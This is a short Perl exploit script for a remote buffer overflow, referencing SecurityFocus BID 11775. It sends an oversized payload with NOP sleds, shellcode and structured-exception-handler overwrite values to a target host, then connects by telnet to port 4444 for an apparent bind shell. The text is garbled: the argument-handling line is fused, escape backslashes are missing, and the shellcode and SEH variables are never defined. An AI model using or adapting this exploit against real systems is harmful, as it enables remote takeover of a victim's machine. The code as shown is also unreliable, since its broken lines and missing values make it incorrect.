#!/usr/bin/perl

#

# http://www.securityfocus.com/bid/11775

# credit to Muts for this vulnerability

# acaro [at] jervus.it

use IO::Socket::INET;

use Switch;

if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);

$socket or die "Cannot connect to host!n";

recv($socket, $reply, 1024, 0);

print "Response:" . $reply;

send $socket, $request, 0;

print "[ ] Sent 1st requestn";

recv($socket, $reply, 1024, 0);

print "Response:" . $reply;

sleep(1);

my $request ="x41" x 255;

send $socket, $request, 0;

print "[ ] Sent 2nd requestn";

sleep(1);

my $request=("x45" x7420).("x90" x10).$happy.("x90" x14).$shellcode.("x41" x8).$nextseh.$seh.("x90" x5).$jmp.("x90" x533);

send $socket, $request, 0;

print "[ ] Sent final requestn";

sleep(1);

close($socket);

print " connect on port 4444 of $host ...n";

sleep(3);

system("telnet $host 4444");

exit;

//http://www.leftworld.net